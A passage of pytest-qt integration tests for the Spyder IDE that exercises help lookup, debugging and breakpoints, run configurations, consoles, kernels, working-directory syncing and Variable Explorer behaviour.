qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import matplotlib.pyplot as plt",
"The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
"debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
shell.pdb_execute("!exit")
qtbot.wait(500)
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are still on debugging
try:
assert shell.is_waiting_pdb_input()
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.get_focus_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.filenames == ['', test_file]
assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert km.kernel.poll() is not None
assert spykm.kernel.poll() is not None
if spykm._restarter:
assert spykm._restarter.poll() is not None
if km._restarter:
assert km._restarter.poll() is not None
# Close the channels
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.first
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.fileexplorer.treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
LooseVersion(ipy_release.version) == LooseVersion('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.explorer.treewidget.get_index('notebook.ipynb')
projects.explorer.treewidget.setCurrentIndex(idx)
# Prese Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that notebook was open
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))
# Assert notebook was open
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.explorer.treewidget.get_index('script.py')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the file was open
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that the breakpoint was set
shell.pdb_execute("!b")
qtbot.wait(500)
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
reason="It times out sometimes on Windows, it's not "
"meant to be run outside of a CI and it segfaults "
"too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still opem.
3. Closing that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
